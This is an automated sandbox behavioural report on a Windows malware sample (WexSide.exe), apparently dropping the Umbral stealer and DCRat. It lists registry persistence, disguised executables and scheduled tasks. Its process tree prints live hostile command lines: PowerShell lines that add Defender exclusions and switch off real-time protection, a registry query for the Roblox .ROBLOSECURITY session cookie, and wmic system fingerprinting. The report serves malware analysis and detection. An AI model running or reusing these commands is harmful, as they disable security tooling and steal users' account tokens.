Analysis
max time kernel: 1200s
max time network: 1201s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-05-2024 12:01
Static task: static1
Behavioral task: behavioral1
Sample: WexSide.exe
Resource: win10v2004-20240508-en
General
Target: WexSide.exe
Size: 2.2MB
MD5: 185d2eb442c0f2c465ff5fc759621de6
SHA1: fceed286074f22e85287570ffa735d5874c8a139
SHA256: de88a6957905b06ffa24d512b148dd6fee45df029c676f1b0755fe0fa73ea871
SHA512: b9b25092fea71f573ca8c42beb376e53d0b9b68bc208990ba726b9c7c935ee243b78cd5fb84ce854445abba9d54b2e59c04ead03f1f5eec28286f2501e85bdeb
SSDEEP: 49152:RFUvKLlr9rxyRciFlXKUusoNSAHWlCcHANKMY2Xj:RavGlrJxyRc2XKdSA2hnMY2Xj
Malware Config
Signatures
Detect Umbral payload (2 IoCs)
resource | yara_rule
behavioral1/files/0x0008000000023310-25.dat | family_umbral
behavioral1/memory/4588-33-0x0000018D76460000-0x0000018D764A0000-memory.dmp | family_umbral

Modifies WinLogon for persistence (2 TTPs, 7 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\", \"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\", \"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\", \"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\WindowsRE\\dwm.exe\", \"C:\\Recovery\\WindowsRE\\TextInputHost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\", \"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\", \"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\Discord\\Updater.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Notepad++ Upgrade.exe" | SlasherTeam.exe

Process spawned unexpected child process (18 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description (identical for all 18 rows): Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
pid | pid_target | Process | procid_target
2432 | 1164 | schtasks.exe | 94
1492 | 1164 | schtasks.exe | 94
3044 | 1164 | schtasks.exe | 94
3132 | 1164 | schtasks.exe | 94
4328 | 1164 | schtasks.exe | 94
3640 | 1164 | schtasks.exe | 94
4032 | 1164 | schtasks.exe | 94
1276 | 1164 | schtasks.exe | 94
3200 | 1164 | schtasks.exe | 94
1852 | 1164 | schtasks.exe | 94
4984 | 1164 | schtasks.exe | 94
1324 | 1164 | schtasks.exe | 94
1332 | 1164 | schtasks.exe | 94
5104 | 1164 | schtasks.exe | 94
216 | 1164 | schtasks.exe | 94
224 | 1164 | schtasks.exe | 94
1372 | 1164 | schtasks.exe | 94
3772 | 1164 | schtasks.exe | 94

Command and Scripting Interpreter: PowerShell (1 TTPs, 7 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
3948 | powershell.exe
3080 | powershell.exe
4136 | powershell.exe
1844 | powershell.exe
4276 | powershell.exe
3292 | powershell.exe
448 | powershell.exe

Drops file in Drivers directory (1 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Minecraft 1.16.5.exe

Checks computer location settings (2 TTPs, 5 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | jpzkqk.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | WexSide.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | DCRatBuild.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | Updater.exe

Executes dropped EXE (20 IoCs)
pid | Process
4860 | DCRatBuild.exe
3204 | SlasherTeam.exe
4588 | Minecraft 1.16.5.exe
2548 | Updater.exe
2136 | msedge.exe
5680 | TextInputHost.exe
228 | jpzkqk.exe
5136 | dwm.exe
380 | SlasherTeam.exe
2204 | msedge.exe
5068 | fontdrvhost.exe
1088 | msedge.exe
1888 | Updater.exe
2316 | dwm.exe
2212 | TextInputHost.exe
3604 | spoolsv.exe
5704 | fontdrvhost.exe
4932 | msedge.exe
2388 | Updater.exe
2248 | dwm.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 13 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Recovery\\WindowsRE\\TextInputHost.exe\"" | Updater.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Default\\Pictures\\fontdrvhost.exe\"" | Updater.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" | Updater.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files\\7-Zip\\Lang\\msedge.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\Discord\\Updater.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\"" | Updater.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\Discord\\Updater.exe\"" | Updater.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Internet Explorer\\it-IT\\spoolsv.exe\"" | Updater.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Recovery\\WindowsRE\\TextInputHost.exe\"" | Updater.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pisya = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Audacity Upgrade.exe" | SlasherTeam.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\WindowsRE\\dwm.exe\"" | Updater.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
36 | discord.com
37 | discord.com

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
21 | ip-api.com

Drops file in System32 directory (2 IoCs)
description | ioc | Process
File created | \??\c:\Windows\System32\CSC6CCDE66B4B8D4942B78F91C89C8EB53.TMP | csc.exe
File created | \??\c:\Windows\System32\jpzkqk.exe | csc.exe

Drops file in Program Files directory (7 IoCs)
description | ioc | Process
File created | C:\Program Files\Internet Explorer\it-IT\spoolsv.exe | Updater.exe
File created | C:\Program Files\Internet Explorer\it-IT\f3b6ecef712a24 | Updater.exe
File created | \??\c:\Program Files (x86)\Microsoft\Edge\Application\CSCA72995458D514213A337DC9C621D8484.TMP | csc.exe
File created | \??\c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | csc.exe
File created | C:\Program Files\7-Zip\Lang\msedge.exe | Updater.exe
File opened for modification | C:\Program Files\7-Zip\Lang\msedge.exe | Updater.exe
File created | C:\Program Files\7-Zip\Lang\61a52ddc9dd915 | Updater.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe

Creates scheduled task(s) (1 TTPs, 18 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1332 | schtasks.exe
224 | schtasks.exe
3772 | schtasks.exe
3132 | schtasks.exe
4328 | schtasks.exe
3640 | schtasks.exe
1324 | schtasks.exe
2432 | schtasks.exe
1852 | schtasks.exe
1276 | schtasks.exe
3200 | schtasks.exe
5104 | schtasks.exe
216 | schtasks.exe
1372 | schtasks.exe
1492 | schtasks.exe
3044 | schtasks.exe
4032 | schtasks.exe
4984 | schtasks.exe

Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine videocard installed.
pid | Process
4820 | wmic.exe

Enumerates system info in registry (2 TTPs, 6 IoCs)
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe

Modifies data under HKEY_USERS (3 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133616308035016984" | chrome.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe

Modifies registry class (9 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | Updater.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | taskmgr.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | DCRatBuild.exe
Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | taskmgr.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | taskmgr.exe

Runs ping.exe (1 TTPs, 2 IoCs)
pid | Process
5360 | PING.EXE
5312 | PING.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
2548 | Updater.exe (the same row is recorded 64 times)

Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
pid | Process
5680 | TextInputHost.exe
5940 | taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
pid | Process
5012 | chrome.exe (recorded 3 times)
3888 | chrome.exe (recorded 4 times)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3204 | SlasherTeam.exe
Token: SeDebugPrivilege | 4588 | Minecraft 1.16.5.exe
Token: SeDebugPrivilege | 2548 | Updater.exe
Token: SeDebugPrivilege | 3948 | powershell.exe
Token: SeDebugPrivilege | 2376 | powershell.exe
Token: SeDebugPrivilege | 1316 | powershell.exe
Token: SeDebugPrivilege | 3080 | powershell.exe
Token: SeDebugPrivilege | 4276 | powershell.exe
Token: SeDebugPrivilege | 4136 | powershell.exe
Token: SeDebugPrivilege | 3292 | powershell.exe
Token: SeDebugPrivilege | 1844 | powershell.exe
Token: SeDebugPrivilege | 448 | powershell.exe
Token: SeDebugPrivilege | 5392 | powershell.exe
Token: SeDebugPrivilege | 5680 | TextInputHost.exe
The following sequence of 21 rows is recorded twice for PID 5800 (42 rows in total):
Token: SeIncreaseQuotaPrivilege | 5800 | wmic.exe
Token: SeSecurityPrivilege | 5800 | wmic.exe
Token: SeTakeOwnershipPrivilege | 5800 | wmic.exe
Token: SeLoadDriverPrivilege | 5800 | wmic.exe
Token: SeSystemProfilePrivilege | 5800 | wmic.exe
Token: SeSystemtimePrivilege | 5800 | wmic.exe
Token: SeProfSingleProcessPrivilege | 5800 | wmic.exe
Token: SeIncBasePriorityPrivilege | 5800 | wmic.exe
Token: SeCreatePagefilePrivilege | 5800 | wmic.exe
Token: SeBackupPrivilege | 5800 | wmic.exe
Token: SeRestorePrivilege | 5800 | wmic.exe
Token: SeShutdownPrivilege | 5800 | wmic.exe
Token: SeDebugPrivilege | 5800 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 5800 | wmic.exe
Token: SeRemoteShutdownPrivilege | 5800 | wmic.exe
Token: SeUndockPrivilege | 5800 | wmic.exe
Token: SeManageVolumePrivilege | 5800 | wmic.exe
Token: 33 | 5800 | wmic.exe
Token: 34 | 5800 | wmic.exe
Token: 35 | 5800 | wmic.exe
Token: 36 | 5800 | wmic.exe
Remaining rows for PID 5900:
Token: SeIncreaseQuotaPrivilege | 5900 | wmic.exe
Token: SeSecurityPrivilege | 5900 | wmic.exe
Token: SeTakeOwnershipPrivilege | 5900 | wmic.exe
Token: SeLoadDriverPrivilege | 5900 | wmic.exe
Token: SeSystemProfilePrivilege | 5900 | wmic.exe
Token: SeSystemtimePrivilege | 5900 | wmic.exe
Token: SeProfSingleProcessPrivilege | 5900 | wmic.exe
Token: SeIncBasePriorityPrivilege | 5900 | wmic.exe

Suspicious use of FindShellTrayWindow (64 IoCs)
pid | Process
5940 | taskmgr.exe (the same row is recorded 64 times)

Suspicious use of SendNotifyMessage (64 IoCs)
pid | Process
5940 | taskmgr.exe (the same row is recorded 64 times)

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | pid_target | Process | procid_target
PID 2280 wrote to memory of 4860 | 2280 | WexSide.exe | 91 (recorded 3 times)
PID 2280 wrote to memory of 3204 | 2280 | WexSide.exe | 92 (recorded 2 times)
PID 2280 wrote to memory of 4588 | 2280 | WexSide.exe | 93 (recorded 2 times)
PID 4860 wrote to memory of 4512 | 4860 | DCRatBuild.exe | 95 (recorded 3 times)
PID 4512 wrote to memory of 4820 | 4512 | WScript.exe | 98 (recorded 3 times)
PID 4820 wrote to memory of 2548 | 4820 | cmd.exe | 100 (recorded 2 times)
PID 4588 wrote to memory of 3488 | 4588 | Minecraft 1.16.5.exe | 102 (recorded 2 times)
PID 4588 wrote to memory of 3948 | 4588 | Minecraft 1.16.5.exe | 104 (recorded 2 times)
PID 2548 wrote to memory of 1168 | 2548 | Updater.exe | 109 (recorded 2 times)
PID 1168 wrote to memory of 984 | 1168 | csc.exe | 111 (recorded 2 times)
PID 2548 wrote to memory of 1868 | 2548 | Updater.exe | 112 (recorded 2 times)
PID 4588 wrote to memory of 2376 | 4588 | Minecraft 1.16.5.exe | 114 (recorded 2 times)
PID 1868 wrote to memory of 4144 | 1868 | csc.exe | 116 (recorded 2 times)
PID 4588 wrote to memory of 1316 | 4588 | Minecraft 1.16.5.exe | 121 (recorded 2 times)
PID 2548 wrote to memory of 448 | 2548 | Updater.exe | 134 (recorded 2 times)
PID 2548 wrote to memory of 3292 | 2548 | Updater.exe | 135 (recorded 2 times)
PID 2548 wrote to memory of 4276 | 2548 | Updater.exe | 136 (recorded 2 times)
PID 2548 wrote to memory of 3080 | 2548 | Updater.exe | 137 (recorded 2 times)
PID 2548 wrote to memory of 1844 | 2548 | Updater.exe | 138 (recorded 2 times)
PID 2548 wrote to memory of 4136 | 2548 | Updater.exe | 139 (recorded 2 times)
PID 2548 wrote to memory of 4224 | 2548 | Updater.exe | 147 (recorded 2 times)
PID 4224 wrote to memory of 5240 | 4224 | cmd.exe | 149 (recorded 2 times)
PID 4224 wrote to memory of 5360 | 4224 | cmd.exe | 150 (recorded 2 times)
PID 4588 wrote to memory of 5392 | 4588 | Minecraft 1.16.5.exe | 151 (recorded 2 times)
PID 4224 wrote to memory of 5680 | 4224 | cmd.exe | 153 (recorded 2 times)
PID 4588 wrote to memory of 5800 | 4588 | Minecraft 1.16.5.exe | 154 (recorded 2 times)
PID 4588 wrote to memory of 5900 | 4588 | Minecraft 1.16.5.exe | 156 (recorded 2 times)
PID 4588 wrote to memory of 5964 | 4588 | Minecraft 1.16.5.exe | 158 (recorded 2 times)
PID 4588 wrote to memory of 6060 | 4588 | Minecraft 1.16.5.exe | 160 (recorded 2 times)
PID 4588 wrote to memory of 4820 | 4588 | Minecraft 1.16.5.exe | 162 (recorded 2 times)
PID 4588 wrote to memory of 3984 | 4588 | Minecraft 1.16.5.exe | 167

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 1 IoCs)
pid | Process
3488 | attrib.exe

Processes
(tree depth is shown in brackets; each entry lists the image path, the PID, the command line, and the signatures that matched)

[1] C:\Users\Admin\AppData\Local\Temp\WexSide.exe (PID 2280)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\WexSide.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe (PID 4860)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\WScript.exe (PID 4512)
        cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Discord\T1NFhHkgq1TxEudZp4T5tcPMCxBHzViymHwuXZcM1.vbe"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe (PID 4820)
          cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Discord\UBpnz6SmdVDq0k17g6u44x.bat" "
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Roaming\Discord\Updater.exe (PID 2548)
            cmdline: "C:\Users\Admin\AppData\Roaming\Discord/Updater.exe"
            - Modifies WinLogon for persistence
            - Checks computer location settings
            - Executes dropped EXE
            - Adds Run key to start application
            - Drops file in Program Files directory
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1168)
              cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnhqkya2\gnhqkya2.cmdline"
              - Drops file in Program Files directory
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 984)
                cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF637.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA72995458D514213A337DC9C621D8484.TMP"
          [6] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1868)
              cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\az3e1igp\az3e1igp.cmdline"
              - Drops file in System32 directory
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 4144)
                cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6E3.tmp" "c:\Windows\System32\CSC6CCDE66B4B8D4942B78F91C89C8EB53.TMP"
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 448)
              cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3292)
              cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\TextInputHost.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4276)
              cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3080)
              cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\fontdrvhost.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1844)
              cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\msedge.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4136)
              cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\System32\cmd.exe (PID 4224)
              cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Y5VhvajCCX.bat"
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\system32\chcp.com (PID 5240)
                cmdline: chcp 65001
            [7] C:\Windows\system32\PING.EXE (PID 5360)
                cmdline: ping -n 10 localhost
                - Runs ping.exe
            [7] C:\Recovery\WindowsRE\TextInputHost.exe (PID 5680)
                cmdline: "C:\Recovery\WindowsRE\TextInputHost.exe"
                - Executes dropped EXE
                - Suspicious behavior: GetForegroundWindowSpam
                - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe (PID 3204)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"
      - Modifies WinLogon for persistence
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe (PID 4588)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe"
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SYSTEM32\attrib.exe (PID 3488)
        cmdline: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe"
        - Views/modifies file attributes
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3948)
        cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2376)
        cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1316)
        cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5392)
        cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\Wbem\wmic.exe (PID 5800)
        cmdline: "wmic.exe" os get Caption
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\Wbem\wmic.exe (PID 5900)
        cmdline: "wmic.exe" computersystem get totalphysicalmemory
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\Wbem\wmic.exe (PID 5964)
        cmdline: "wmic.exe" csproduct get uuid
